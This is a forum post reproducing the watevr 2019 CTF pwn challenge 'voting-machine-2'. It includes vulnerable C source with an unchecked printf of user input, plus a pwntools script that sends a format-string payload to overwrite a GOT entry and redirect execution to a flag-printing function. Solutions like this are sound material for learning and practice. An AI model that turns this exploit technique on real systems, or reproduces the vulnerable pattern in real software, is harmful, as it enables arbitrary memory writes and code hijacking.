查看: 141|回复: 0

[Pwn] watevr_2019_pwn_voting-machine-2

[复制链接]
发表于 2020-5-1 19:25:47 | 显示全部楼层 |阅读模式
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

void super_secret_function(){
  FILE *f;
  char c;
  f = fopen("/home/ctf/flag.txt", "r");
  if(f == NULL){
      printf("Cannot open flag.txt\n");
  }
  c = fgetc(f);
  while(c != EOF){
      printf ("%c", c);
      c = fgetc(f);
  }
  fflush(stdout);
  fclose(f);
}

void exit_f(int sign){
        exit(0);
}

int main(){
  signal(SIGALRM, exit_f);
  alarm(5);
  char input[50];
  printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
  printf("We noticed that there occured a slight buffer overflow in the previous version.\n");
  printf("Now we never return, so the problem should be solved? Right?\n");
  printf("Today you are the one who decides what we will vote about.\n\n");
  printf("Topic: ");

  fflush(stdin);
  fflush(stdout);
  scanf("%[^\n]%*c", input);
  printf(input);

  printf("\nWill be the voting topic of today!\n");
  exit(0);
}
#This challenge is based on a BOF -> GOT -> code redirect that occurs in printf() which *can* replace arbitrary memory.
# 08 42 05 36 <super_secret_function>:
#08422028 R_386_JUMP_SLOT   [email protected]_2.0

from pwn import *
import time

def main(ip, port, flag):
    if True:
        r = remote(ip, port)
        r.sendline("AA\x25\x20\x42\x08A%8$hhnA\x24\x20\x42\x08%42x%11$hhnA\x26\x20\x42\x08%7x%15$hhn")
        print("payload sent")
        response = r.recvall()
        #we replace the GOT entry for exit with the super secret function
        if flag in str(response):
            print("Correct")
            exit(0)
        elif "flag.txt" in str(response):
            print("missing flag.txt")
        else:
            print("Incorrect")
            print("Response: " + str(response))
            exit(1)


#Validation section
flag = input("Flag: ").replace("\n", "")
ip, port = input("service: ").split(":")
main(str(ip), int(port), str(flag))


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046
微信公众号
快速回复 返回顶部 返回列表